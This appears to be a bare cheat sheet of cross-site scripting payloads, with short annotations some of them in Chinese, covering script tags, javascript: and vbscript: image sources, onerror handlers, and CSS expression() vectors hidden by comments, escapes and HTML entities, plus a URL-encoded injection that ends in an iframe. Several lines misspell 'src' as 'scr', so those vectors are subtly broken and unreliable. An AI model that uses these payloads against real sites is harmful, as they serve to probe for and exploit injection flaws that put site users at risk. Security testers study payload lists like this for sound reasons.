<script>alert("跨站")</script> (most commonly used)
<img scr=javascript:alert("跨站")></img>
<img scr="javascript: alert(/跨站/)></img>
<img scr="javas????cript:alert(/跨站/)" width=150></img> (whitespace made with the Tab key)
<img scr="#" onerror=alert(/跨站/)></img>
<img scr="#" style="xss:expression(alert(/xss/));"></img>
<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ denotes a comment)
<img src=vbscript:msgbox ("xss")></img>
<style> input {left:expression (alert('xss'))}</style>
<div style={left:expression (alert('xss'))}></div>
<div style={left:exp/* */ression (alert('xss'))}></div>
<div style={left:\0065\0078ression (alert('xss'))}></div>
HTML entity <div style={left:&#x0065;xpression (alert('xss'))}></div>
Unicode <div style="{left:expRessioN (alert('xss'))}">
"]}%3Cscript%3Ealert('我又来啦!.')%3C/script%3E{[&item="]<iframe%20src=WWW.BAIDU.COM%20width=400%20height=600></iframe>["